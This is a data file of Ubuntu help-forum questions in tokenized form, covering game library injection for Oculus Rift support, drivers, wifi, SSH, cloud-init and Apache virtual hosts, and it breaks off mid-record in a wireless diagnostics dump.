513317	oculus rift with antichamber on ubuntu 14.04	antichamber runs great on linux ( steam version ) . but it is not playable with the oculus rift at this point . the issues are : 1 ) no headtracking 2 ) graphics are not being split and distorted by oculus sdk my current plan is to use ld_preload to add the functionality , this seems to be the linux equivalent of dll injection . antichamber appears to be using sdl , i 'm hoping this can be configured to use the headtracking data as a joystick and apply the graphics distortion , but i am not sure which functions i should be looking for . is there a simpler way of getting these issues resolved ? is sdl the right choice here ? would appreciate any information on how the unreal engine 3 works under linux ; and library injection too . edit : here is the information i have so far , still not sure which functions i should be looking for ( not familiar with sdl or opengl ) : articles on ld_preload and shared object injection ; here and here antichamber ( steam version ) directory is : ~/.steam/steam/steamapps/common/antichamber the executable is at : antichamber/binaries/linux/udkgame-linux had to install libvorbisfile3 : i386 to get the executable to run from the command line . ( steam was able to start the game without installing this ) $ ldd udkgame-linux linux-gate.so.1 = > ( 0xf775d000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf7716000 ) libsdl2_mixer-2.0.so.0 = > /home/workstation/.steam/steam/steamapps/common/antichamber/binaries/linux/./lib/libsdl2_mixer-2.0.so.0 ( 0xf76d0000 ) libogg.so.0 = > /usr/lib/i386-linux-gnu/libogg.so.0 ( 0xf76c6000 ) libvorbis.so.0 = > /usr/lib/i386-linux-gnu/libvorbis.so.0 ( 0xf769a000 ) libvorbisfile.so.3 = > /usr/lib/i386-linux-gnu/libvorbisfile.so.3 ( 0xf7690000 ) libsdl2-2.0.so.0 = > /home/workstation/.steam/steam/steamapps/common/antichamber/binaries/linux/./lib/libsdl2-2.0.so.0 ( 0xf75a7000 ) libgl.so.1 = > /usr/lib32/nvidia-331-updates/libgl.so.1 ( 0xf74a3000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf749d000 ) librt.so.1 = > /lib/i386-linux-gnu/librt.so.1 ( 0xf7494000 ) libsteam_api.so = > /home/workstation/.steam/steam/steamapps/common/antichamber/binaries/linux/./lib/libsteam_api.so ( 0xf7481000 ) libtcmalloc.so.0 = > /home/workstation/.steam/steam/steamapps/common/antichamber/binaries/linux/./lib/libtcmalloc.so.0 ( 0xf7424000 ) libstdc++.so.6 = > /usr/lib/i386-linux-gnu/libstdc++.so.6 ( 0xf733b000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf72f4000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0xf72d7000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf7127000 ) /lib/ld-linux.so.2 ( 0xf775e000 ) libnvidia-tls.so.331.38 = > /usr/lib32/nvidia-331-updates/tls/libnvidia-tls.so.331.38 ( 0xf7123000 ) libnvidia-glcore.so.331.38 = > /usr/lib32/nvidia-331-updates/libnvidia-glcore.so.331.38 ( 0xf4edf000 ) libx11.so.6 = > /usr/lib/i386-linux-gnu/libx11.so.6 ( 0xf4daa000 ) libxext.so.6 = > /usr/lib/i386-linux-gnu/libxext.so.6 ( 0xf4d97000 ) libxcb.so.1 = > /usr/lib/i386-linux-gnu/libxcb.so.1 ( 0xf4d75000 ) libxau.so.6 = > /usr/lib/i386-linux-gnu/libxau.so.6 ( 0xf4d71000 ) libxdmcp.so.6 = > /usr/lib/i386-linux-gnu/libxdmcp.so.6 ( 0xf4d6a000 ) $ nm -du udkgame-linux u abort u accept u access u __assert_fail u backtrace u bind u chdir u close u closedir u connect u __ctype_b_loc u __ctype_toupper_loc u __cxa_atexit u __cxa_begin_catch u __cxa_call_unexpected u __cxa_end_catch u __cxa_guard_abort u __cxa_guard_acquire u __cxa_guard_release u __cxa_pure_virtual u difftime u __divdi3 u dlclose u dlerror u dlopen u dlsym u __errno_location u fclose u fcntl u feof u ferror u fflush u fgets u __finitef u fopen u fprintf u fputc u fread u free u frexp u fseek u ftell u fwrite u __fxstat u getcwd u getenv u gethostname u getifaddrs u getpid u getsockname u getsockopt u gettimeofday u glalphafunc u glbegin u glbindtexture u glblendfunc u glclear u glclearcolor u glcleardepth u glclearstencil u glcolormask u glcullface u gldeletetextures u gldepthfunc u gldepthmask u gldepthrange u gldisable u gldrawarrays u gldrawbuffer u glenable u glend u glgentextures u glgetintegerv u glgetstring u glpixelstorei u glpolygonmode u glpolygonoffset u glreadbuffer u glreadpixels u glscissor u glstencilfunc u glstencilmask u glstencilop u gltexcoord2f u gltexenvf u glteximage2d u gltexparameteri u gltexsubimage2d u glvertex2f u glviewport u glxgetclientstring u glxgetprocaddressarb u glxqueryversion w __gmon_start__ u gmtime u gmtime_r u __gxx_personality_v0 u inet_addr u ioctl u isalnum u isalpha u __isinff u __isnanf u isspace u iswpunct w _jv_registerclasses u __libc_start_main u listen u localtime_r u lseek u malloc u memcmp u memcpy u memmove u memset u minoritymix_setposition u mkdir u __moddi3 u open u opendir u ov_clear u ov_info u ov_open_callbacks u ov_pcm_seek_page u ov_pcm_total u ov_read u ov_time_total u pause u powf u printf u pthread_cond_broadcast u pthread_cond_destroy u pthread_cond_init u pthread_cond_signal u pthread_cond_timedwait u pthread_cond_wait u pthread_create u pthread_detach u pthread_getspecific u pthread_key_create u pthread_key_delete u pthread_mutexattr_init u pthread_mutexattr_settype u pthread_mutex_destroy u pthread_mutex_init u pthread_mutex_lock u pthread_mutex_unlock u pthread_self u pthread_setspecific u qsort u rand u read u readdir u realloc u recv u recvfrom u rename u rmdir u sched_yield u sdl_buildaudiocvt u sdl_clearerror u sdl_closeaudio u sdl_convertaudio u sdl_convertsurfaceformat u sdl_creatergbsurface u sdl_createtexturefromsurface u sdl_createwindow u sdl_destroywindow u sdl_error u sdl_fillrect u sdl_free u sdl_freesurface u sdl_gamecontrollerclose u sdl_gamecontrolleropen u sdl_getclosestdisplaymode u sdl_getdesktopdisplaymode u sdl_getdisplaymode u sdl_geterror u sdl_getkeyboardfocus u sdl_getnumdisplaymodes u sdl_getnumvideodisplays u sdl_getprefpath u sdl_getwindowdisplayindex u sdl_getwindowsize u sdl_gl_createcontext u sdl_gl_deletecontext u sdl_gl_makecurrent u sdl_gl_setattribute u sdl_gl_swapwindow u sdl_init u sdl_isgamecontroller u sdl_isspace u sdl_lockaudiodevice u sdl_malloc u sdl_memcmp u sdl_memcpy u sdl_memset u sdl_mixaudioformat u sdl_numjoysticks u sdl_openaudiodevice u sdl_pauseaudiodevice u sdl_pollevent u sdl_pushevent u sdl_quit u sdl_readbe32 u sdl_readle16 u sdl_readle32 u sdl_realloc u sdl_rwfromfile u sdl_setcolorkey u sdl_seterror u sdl_sethint u sdl_setmainready u sdl_setwindowgrab u sdl_setwindowicon u sdl_showcursor u sdl_snprintf u sdl_sscanf u sdl_strcmp u sdl_strncasecmp u sdl_strncmp u sdl_unlockaudiodevice u sdl_upperblit u sdl_warpmouseinwindow u select u send u sendto u setsockopt u snprintf u socket u sprintf u srand u sscanf u steamapi_init u steamapi_registercallback u steamapi_registercallresult u steamapi_restartappifnecessary u steamapi_runcallbacks u steamapi_shutdown u steamapi_unregistercallback u steamapi_unregistercallresult u steamapps u steamfriends u steamgameserver u steamgameserver_bsecure u steamgameserver_getsteamid u steamgameserver_init u steamgameservernetworking u steamgameserver_runcallbacks u steamgameserver_shutdown u steamgameserverstats u steamgameserverutils u steammatchmaking u steammatchmakingservers u steamnetworking u steamremotestorage u steamuser u steamuserstats u steamutils u stpcpy u strcasecmp u strchr u strcmp u strcpy u strdup u strlen u strncat u strncmp u strncpy u strrchr u strstr u strtod u strtol u swscanf u time u tolower u toupper u towupper u __umoddi3 u unlink u _unwind_resume u usleep u utimes u vsnprintf u vsprintf u vswprintf u wcscat u wcschr u wcscmp u wcscpy u wcslen u wcsncmp u wcsncpy u wcsrchr u wcsstr u wcstod u wcstoul u wcstoull u wprintf u write u __xstat u _zst9terminatev
513318	where can i find tftp-hpa server 's log file ?	i am using tftp-hpa in ubuntu 12.04 , where can i see the verbose log of the server ? i checked on syslog . there is no log from tftp-hpa server .
513319	gvfs / samba lookup slow since update to 14.04	ever since i moved from 13.10 to 14.04 , i observe an annoying effect whenever a samba share is mounted to my work station . when i open nautilus , or when i look up /run/user/1000/gvfs it freezes for several seconds . this is also the case when i choose `` save as '' from a program , as the file save dialog includes shortcuts to the mounted shares . have you also observed such behavior ? is there a way to debug it ?
513320	upgrading from ubuntu 12.04 to 14.04	after upgrading from version 12.04 to 14.04.1 . i get a notification : system program problem detected . do you want to report the problem now or cancel ? i cancelled it and seems working fine . but , i would like to know what does it mean and how to solve it .
513321	no graphical interface at start-up	i 'm using ubuntu 14.04 32bits . suddendly at startup appears a black screen asking for my username and password , with a low graphics interface . after entering this nothing happens , only the cursor moves ( a big cross cursor ) . also it is not possible to open the console with crt-alt-t . using the advanced options of grub2 ( open in recovery mode or low graphics mode ) does not work either .
513322	touchpad troubles after last ubuntu system update	i have a lenovo ideapad z710 laptop and i installed ubuntu 14.04 on it a few months back . everything worked great . since the last update though my touchpad mouse has some trouble and it seems as if it `` crashes '' every few seconds . i am new to ubuntu but while looking for a solution it was recommended to look at dmesg output . i can see there that this is logged every few seconds : psmouse serio1 : elantech : unknown hardware version , aborting ... input : ps/2 elantech touchpad as /devices/platform/i8042/serio1/input/input3037 i believe this might happen due to an unsupported driver or something but this seems strange , it worked perfectly before the last update . any guesses on what can i do ? thanks !
513325	changing desktop item text colours on 14.04	i found questions like this on forum , but i need to change only text colour of the items on desktop folder . my wallpaper obstructs the black coloured item names . but i do n't want to change the item name colour of the items at other folders , what can i do ?
513328	desktop shorcut to dial a mobile 3g connection	like in windows , is there any way to create a desktop shortcut to dial a mobile 3g connection ( i 'm using mate de ) ? i use default network manager .
513331	ubuntu 14.04 requested size ** exceeds 3d hardware limit ** - dual monitors	i know this has been discussed before , but the solutions i found is for older versions of ubuntu . what about the 14.04 ? any idea on setting up two monitors to work with ubuntu unity decently ? not interested on gnome or other solutions .
513332	can someone please tell is there any means to install paltalk messenger in ubuntu 14 ( latest ) ?	am using paltalk messenger a long time and recently i changed my operating system from windows to ubuntu 14 , so could someone please lead me to install paltalk in my new arrangement . thanks in advance ! !
513336	problem using touchpad on asus f750l	i 've got a problem since i have successfully installed ubuntu 14.04 as dualboot with windows 8 on my new asus f750l notebook . the touchpad works perfectly with windows 8 , but in ubuntu , i need to use an external mouse as it does n't realize that there is a touchpad . xserver-xorg-input-synaptics is already installed . i also tried : '' dmesg | grep -i touchpad '' which does n't show anything at all ... '' xinput '' : does not recognize anything about the touchpad , too . can you guys help me ? thanks
513337	wifi adaptor can not connect to ap	i am using ubuntu 14.04.1 with a tp-link wifi tl-wn722n adaptor . with help from the guys here , i installed the driver for the adaptor and i can connect it to my smartphone 's hot spot network . ( link : my question about installing the driver ) i can also run the network interface in monitor mode to sniff wifi packet . however , it can not connect to any router ap . please help . thanks a lot !
513338	providing input for while loop	while getopts `` f : t : d : g : o : p : b : q : r : '' opt ; do case `` $ opt '' in ( f ) fan= $ { optarg } ( t ) .. esac done shift $ ( ( optind - 1 ) ) ; how to provide input ? can anyone plz tell me how to provide input for the above mentioned code snippet ?
513339	redirect wrong dns queries to url address ?	i have local machine with bind dns server and i need to redirect wrong dns queries address name to specific address name or web site url like google any suggestions ?
513341	1 software installation problem	i am using ubuntu 12.04 . when i try to install a software from ubuntu software center , it shows a message , before installing this software must remove this program mblazeui ( ( crossplatformui ) ) , and an another choice `` continue anyway '' . if i press continue anyway before completing the installation there is an error message `` package operation failed '' , the installation or removal of a software package will failed . i tried to remove the program `` mblazeui '' from ubuntu software center , before finishing the there also an error message will come package operation failed . now i ca n't install the software . please give me the solution for this .
513345	`` cpu is not supported '' when i attempt to run .sh files on a 32bit version of ubuntu	i have an ubuntu 32bit virtual machine . i am trying to install intel composer on to this machine ( having downloaded it for non commercial use from the intel website ) . however when i try and run any of the .sh files in the package i get a message saying : ] $ ./install.sh cpu is not supported . i have set the file to `` allow executing file as program '' in the permissions . could anyone give me any ideas of how i may fix this ? thank you very much james
513349	how can i know that i have g++ installed in my ubuntu ?	i have recently installed ubuntu 14.04 . i tried to run a c++ code by a command like this : g++ first.cpp -o first then it said : the program 'g++ ' is currently not installed . you can install it by typing : sudo apt-get install g++ and then i did . after typing it and pressing enter it showed a message like this : gedit is already the newest version . libgrail6 is already the newest version . xserver-xorg-core is already the newest version . libgdata13 is already the newest version ... ( and many more lines like this ) then i tried to run the same command given above again . but the terminal said again that i do n't have g++ installed . what am i missing here ? how to run the c++ code now ?
513350	upstart script on first boot with cloud-init	i 'm trying to launch an ec2 instance where i need to perform some initial setup of the instance ( download and install packages , configure directories , etc . ) as well as start a web service . the initial setup should only happen once ( i.e. , on instance creation ) but the web service should be started on all subsequent boots . to handle this , i figured i could use a mime-encoded , cloud-init user data payload consisting of cloud-config data ( which would perform the initial setup tasks ) and an upstart job ( which would be loaded and perform the startup of the web service ) . now , all is working well with this setup , with the exception that the upstart script does n't run on the first boot . looking at the cloud-init documents , its unclear whether or not this is the intended behavior : upstart job content is placed into a file in /etc/init , and will be consumed by upstart as any other upstart job . begins with : # upstart-job or content-type : text/upstart-job when using a mime archive . indeed , everything is working as described here , however , should it start on the first boot ? at the moment i basically have two potential work-arounds : ( 1 ) restart the instance at the end of my initial setup using power_state in my cloud-config data or ( 2 ) call my upstart script as part of my runcmd operations in my cloud-config file . i have tested both of these solutions and they both get the job done , however , i 'm concerned about calling the upstart script from within cloud-config because i 'm unclear whether or not the intent of the upstart job is to simply place the file in /etc/init or if it should be starting it and just is n't for some reason . obviously it would be nice to have to avoid rebooting the server . any insight would be greatly appreciated !
513351	torchlight black screen and does n't show up	when i open it in full screen i get a black screen that covers whole screen , in windowed mode middle of screen.here is a video : https : //copy.com/fvrgw7qij8z0 terminal output : alperen @ alperen-inspiron-n5010 /usr/local/games/torchlight $ ./torchlight.bin.x86_64 creating resource group general creating resource group internal creating resource group autodetect scenemanagerfactory for type 'defaultscenemanager ' registered . registering resourcemanager for type material registering resourcemanager for type mesh registering resourcemanager for type skeleton movableobjectfactory for type 'particlesystem ' registered . overlayelementfactory for type panel registered . overlayelementfactory for type borderpanel registered . overlayelementfactory for type textarea registered . registering resourcemanager for type font archivefactory for archive type filesystem registered . archivefactory for archive type zip registered . freeimage version : 3.13.1 this program uses freeimage , a free , open source image library supporting all common bitmap formats . see http : //freeimage.sourceforge.net for details supported formats : bmp , ico , jpg , jif , jpeg , jpe , jng , koa , iff , lbm , mng , pbm , pbm , pcd , pcx , pgm , pgm , png , ppm , ppm , ras , tga , targa , tif , tiff , wap , wbmp , wbm , psd , cut , xbm , xpm , gif , hdr , g3 , sgi , exr , j2k , j2c , jp2 , pfm , pct , pict , pic , bay , bmq , cr2 , crw , cs1 , dc2 , dcr , dng , erf , fff , hdr , k25 , kdc , mdc , mos , mrw , nef , orf , pef , pxn , raf , raw , rdc , sr2 , srf , arw,3fr , cine , ia , kc2 , mef , nrw , qtk , rw2 , sti , drf , dsc , ptx , cap , iiq , rwz dds codec registering registering resourcemanager for type highlevelgpuprogram registering resourcemanager for type compositor movableobjectfactory for type 'entity ' registered . movableobjectfactory for type 'light ' registered . movableobjectfactory for type 'billboardset ' registered . movableobjectfactory for type 'manualobject ' registered . movableobjectfactory for type 'billboardchain ' registered . movableobjectfactory for type 'ribbontrail ' registered . loading library lib64/ogre/rendersystem_gl installing plugin : gl rendersystem opengl rendering subsystem created . plugin successfully installed loading library lib64/ogre/plugin_particlefx installing plugin : particlefx particle emitter type 'point ' registered particle emitter type 'box ' registered particle emitter type 'ellipsoid ' registered particle emitter type 'cylinder ' registered particle emitter type 'ring ' registered particle emitter type 'hollowellipsoid ' registered particle affector type 'linearforce ' registered particle affector type 'colourfader ' registered particle affector type 'colourfader2 ' registered particle affector type 'colourimage ' registered particle affector type 'colourinterpolator ' registered particle affector type 'scaler ' registered particle affector type 'rotator ' registered particle affector type 'directionrandomiser ' registered particle affector type 'deflectorplane ' registered plugin successfully installed loading library lib64/ogre/plugin_octreescenemanager installing plugin : octree & terrain scene manager plugin successfully installed *-*-* ogre initialising *-*-* version 1.6.5 ( shoggoth ) terminate called after throwing an instance of 'std : :out_of_range' what ( ) : basic_string : :substr error : signal : 6 ./torchlight.bin.x86_64 ( _zn10linuxutils13crash_handlerei+0x25 ) [ 0x17eb6f5 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x37000 ) [ 0x7fc647877000 ] /lib/x86_64-linux-gnu/libc.so.6 ( gsignal+0x39 ) [ 0x7fc647876f89 ] /lib/x86_64-linux-gnu/libc.so.6 ( abort+0x148 ) [ 0x7fc64787a398 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( _zn9__gnu_cxx27__verbose_terminate_handlerev+0x155 ) [ 0x7fc6481826b5 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0x5e836 ) [ 0x7fc648180836 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0x5e863 ) [ 0x7fc648180863 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0x5eaa2 ) [ 0x7fc648180aa2 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( _zst20__throw_out_of_rangepkc+0x67 ) [ 0x7fc6481d25d7 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0xbe3d3 ) [ 0x7fc6481e03d3 ] ./torchlight.bin.x86_64 ( _zn11cfilesystem21buildmassivedatagroupev+0x453 ) [ 0x1617805 ] ./torchlight.bin.x86_64 ( _zn11cfilesystemc1eb+0x14be ) [ 0x16145ae ] ./torchlight.bin.x86_64 ( _zn22cmasterresourcemanagerc1ep9csettings+0x41a ) [ 0xfe1d0a ] ./torchlight.bin.x86_64 ( _zn5cgame5setupeb+0x79a ) [ 0x73ceaa ] ./torchlight.bin.x86_64 ( _zn5cgame5beginepv+0x28d ) [ 0x73b839 ] ./torchlight.bin.x86_64 ( main+0x649 ) [ 0x146dbe4 ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7fc647861ec5 ] ./torchlight.bin.x86_64 [ 0x739ca9 ]
513353	lock screen does not display all users ( ubuntu 14.04 )	when i lock my screen using ctrl+alt+l , i am not able to see other users listed within the lock screen so i can switch instead . the lock screen shows only my name as an option for login , however i would like to switch to other user accounts . in ubuntu 12.04 it used to show all system available users in lock screen and i was able to switch easily . last night i upgraded to ubuntu 14.04 and this option is gone . how do i set back this option ?
513359	does ubuntu delete cache-thumbnails after leaving the guest mode ?	when i leave the guestmode , are there still some cache files ?
513364	having problem with ethernet port ubuntu 14.04	my ethernet light keeps on blinking even after i shut down my laptop . i have dual booted ubuntu 14.04 with windows 8.1 . however , if i show down from windows the light goes off . but in the case of ubuntu it keeps on blinking even after shut down tried reinstalling ethernet drivers but could n't solve the issue . is my ubuntu not able to shut down completely ?
513367	how to make one process to zombie	the question is the title , with one example please show how to make one of the process zombie between all process ?
513369	openssl installed , but ruby unable to require it	i 'm trying to setup github-pages on my ubuntu laptop , and following the guide provided by github i have to install the bundler package ; giving the command ~ $ gem install bundler returns me this error . error : while executing gem ... ( gem : :exception ) unable to require openssl , install openssl and rebuild ruby ( preferred ) or use non-https sources then i have installed openssl , launched the command to update software and stuff and tried again to install bundler , but the error kept showing . how can i fix this ? is there any specific command to rebuild ruby making it aware about the fact that openssl is now installed ?
513370	ubuntu 14.04 - slow scrolling using scroll arrows	newly upgraded from 13.10 to 14.04 . if i open a large document in gedit , or have a large terminal window open , then scrolling using the scroll arrows ( i.e . left-click and hold down on the scroll arrow ) in the vertical scrollbar is slow , as though each 'repeat ' click has about a 0.5 second delay in it . to clarify scrolling in chromium or say open office using mouse-click on scroll arrows is fine scrolling in gedit by holding down up/down keyboard arrow is fine scrolling by grabbing the scrollbar lozenge and dragging is fine i am not using overlay scrollbars . i am using 'traditional ' scrollbars with an arrow at top and bottom . so it 's slow when i click and hold-down on either the top or bottom scroll arrow , as you would when line-scrolling through a large folder . it happens in all of the native applications , e.g . gedit , nautilus , terminal , so i suspect there 's some setting which determines how often a held down mouse button triggers the scroll event ( ? ) i 've investigated changing the settings for keyboard ( initial delay and repeat speed ) and these do n't have an impact . scrolling was fine in these areas in 13.10 ( and earlier ) . ************************** my edit ************************* more information , but not an answer . i think this is controlled by gtk in ubuntu ( ubuntu 14.04 comes with gtk3.10.8 ) - certainly , adding values into ~/.config/gtk-3.0 via a settings.ini file has enabled me to restore scrollbar arrows . i think , looking at the gtk source that `` gtk_notebook_set_scroll_timer '' is what determines how fast a 'notebook ' ( in gtk speak ) will be scrolled . however , looking at this commit the variables in settings to set these values ( gtk-timeout-initial and gtk-timeout-repeat ) have been removed and are now hard-coded at 500 ( delay ) and 50 ( repeat ) . the 'fix ' recommended in http : //ubuntualive.blogspot.co.uk/2014/05/how-to-speed-up-your-user-interface-in.html appears to have no impact , for me . the documentation for gtk agrees that the values are deprecated but no clue as to why , or what is replacing them . anyone tried the 'fix ' mentioned above ? anyone know why the config options have been removed ?
513372	ssh command related problem	i am facing problem with the ssh command currently . earlier , it was working just fine , but now when i am trying to execute the same command , it says , ssh_exchange_identification : read : connection reset by peer . how do i access the web account now ? ssh -v output : openssh_6.6.1 , openssl 1.0.1f 6 jan 2014 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to iiit.ac.in [ 10.4.3.20 ] debug1 : connection established . debug1 : key_load_file : read from key file /home/usr/.ssh/id_rsa failed : is a directory debug1 : identity file /home/usr/.ssh/id_rsa type -1 debug1 : identity file /home/usr/.ssh/id_rsa-cert type -1 debug1 : identity file /home/usr/.ssh/id_dsa type -1 debug1 : identity file /home/usr/.ssh/id_dsa-cert type -1 debug1 : identity file /home/usr/.ssh/id_ecdsa type -1 debug1 : identity file /home/usr/.ssh/id_ecdsa-cert type -1 debug1 : identity file /home/usr/.ssh/id_ed25519 type -1 debug1 : identity file /home/usr/.ssh/id_ed25519-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.6.1p1 ubuntu-2ubuntu2 ssh_exchange_identification : read : connection reset by peer
513374	install ubuntu 14.04 alongside windows 8.1	i have a dell inspiron 15 5000 with windows 8.1 x64 and i want to install ubuntu 14.04 . i have some questions around this : how can i install ubuntu , so i keep the pre-installed windows ? in case i need to re install windows from where do i get the windows installer ? from where can i get a backup of the windows drivers ? thanks for your help .
513375	solar system model live wallpaper	new here ( duh ! ) and i was checking some live wallpapers that are similar to stuff for the android phones and tablets . i am looking for a way to have an actual and interactive solar system model as a live wallpaper . i 'd even go further with it - zoom and wikipedia popups for the planets and maybe even a hubble link that takes you to hubble 's website . i know there are some shiny galaxy 3d models and planets but i have n't seen a solar system or what i am looking for exactly . i 'll also appreciate it if someone can point me at a project that is like this . if i am not making any sense please feel free to let me know and i will try to be more specific .
513376	multiple hits being logged at virtual host setup	i have setup a local virtual host following the instructions listed in digitalocean tutorial i have ubuntu 14.04 i have my application logs enabled at the index page it self and also i have configured the .htaccess file to access redirect each call to index.php only . now my issue is that while i was using my localhost as the url target and then navigating to the site folder inside /var/www/ i was hitting the application page 1 time only . but now after the virtual host setup , i have configured it to system.com , the application logs are showing that the site is being hit about 8-10 times in a single call . can any one tell why ? hosts file 127.0.0.1 system.com www.system.com 127.0.0.1 localhost apache2.conf < directory /var/www/basecode > options indexes followsymlinks allowoverride all require all granted < /directory > system.com.conf in sites-enabled/ < virtualhost system.com:80 > servername system.com serveradmin system @ gmail.com serveralias www.system.com documentroot /var/www/system.com errorlog /var/www/system.com/error.log customlog /var/www/system.com/access.log combined < /virtualhost >
513377	unstable wireless ubuntu 14.04	the internet connection is relatively stable however it seems to drop every few minutes for 10-20 seconds . panda ultra wireless n unstable connection http : //www.amazon.com/panda-ultra-wireless-adapter-150mbps/product-reviews/b00762ynmg ======== wireless-info start ======== system-info ~~~~~~~~~~~~~~~~~~~~~~~~ tsohg 3.13.0-34-generic x86_64 , ubuntu 14.04.1 lts , trusty cpu : intel ( r ) core ( tm ) i7-3770k cpu @ 3.50ghz memory : 15995 mb uptime : 08:46:02 up 24 min , 2 users , load average : 0.76 , 0.85 , 0.74 lspci ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8169 lsusb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 006 : id 093a:2510 pixart imaging , inc. optical mouse bus 001 device 005 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter bus 001 device 004 : id 0b38:0010 gear head 107-key keyboard bus 001 device 003 : id 047f : c010 plantronics , inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub pcmcia card info ~~~~~~~~~~~~~~~~~~~ iwconfig ~~~~~~~~~~~~~~~~~~~~~~~~~~~ wlan0 ieee 802.11bgn essid : '' nehtgaer '' mode : managed frequency:2.412 ghz access point : < mac c-01 nehtgaer > bit rate=19.5 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=39/70 signal level=-71 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:202 invalid misc:421 missed beacon:0 rfkill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ interface soft blocked hard blocked 0 : phy0 : wireless lan no no lsmod ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rt2800usb 27034 0 rt2x00usb 20742 1 rt2800usb rt2800lib 89076 1 rt2800usb rt2x00lib 55307 3 rt2x00usb , rt2800lib , rt2800usb mac80211 630653 3 rt2x00lib , rt2x00usb , rt2800lib cfg80211 484040 2 mac80211 , rt2x00lib crc_ccitt 12707 1 rt2800lib module parameters ~~~~~~~~~~~~~~~~~~ cfg80211 ( 2 ) : cfg80211_disable_40mhz_24ghz=n | ieee80211_regdom=00 mac80211 ( 5 ) : beacon_loss_count=7 | ieee80211_default_rc_algo=minstrel_ht | max_nullfunc_tries=2 | max_probe_tries=5 | probe_wait_ms=500 rt2800usb ( 1 ) : nohwcrypt=n nm-tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ state : unknown ================o======o========o========o=========o===========o==============o=========== interface & id | type | driver | state | default | speed | support | hw addr ================o======o========o========o=========o===========o==============o=========== | | | | | | | -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- + -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- + -- -- -- -- -- - networkmanager.state ~~~~~~~~~~~~~~~ [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true networkmanager.conf ~~~~~~~~~~~~~~~~ [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false nm wifi profiles ~~~~~~~~~~~~~~~~~~~ nehtgaer : ssid=nehtgaer | mac-address= < mac wlan0 > | ipv6=ignore | ipv4=auto interfaces ~~~~~~~~~~~~~~~~~~~~~~~~~ # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback resolv.conf ~~~~~~~~~~~~~~~~~~~~~~~~ nameserver 192.168.1.1 routes & ping ~~~~~~~~~~~~~~~~~~~~~~ kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 -- - 192.168.1.1 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 999ms rtt min/avg/max/mdev = 0.702/1.402/2.103/0.701 ms -- - 192.168.1.1 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 999ms rtt min/avg/max/mdev = 0.760/0.820/0.881/0.066 ms iw reg get ~~~~~~~~~~~~~~~~~~~~~~~~~ ( region : `` en_us.utf-8 '' ) country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss iwlist chan ~~~~~~~~~~~~~~~~~~~~~~~~ wlan0 14 channels in total ; available frequencies : channel 01 ( 2.412 ghz ) - 14 ( 2.484 ghz ) current frequency:2.412 ghz ( channel 1 ) iwlist scan ~~~~~~~~~~~~~~~~~~~~~~~~ wlan0 scan completed : cell 01 - address : < mac c-01 nehtgaer > channel:1 frequency:2.412 ghz ( channel 1 ) quality=39/70 signal level=-71 dbm encryption key : off essid : '' nehtgaer '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000001ea5926265 extra : last beacon : 44ms ago blacklist ~~~~~~~~~~~~~~~~~~~~~~~~~~ [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci modinfo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ rt2800usb ] filename : 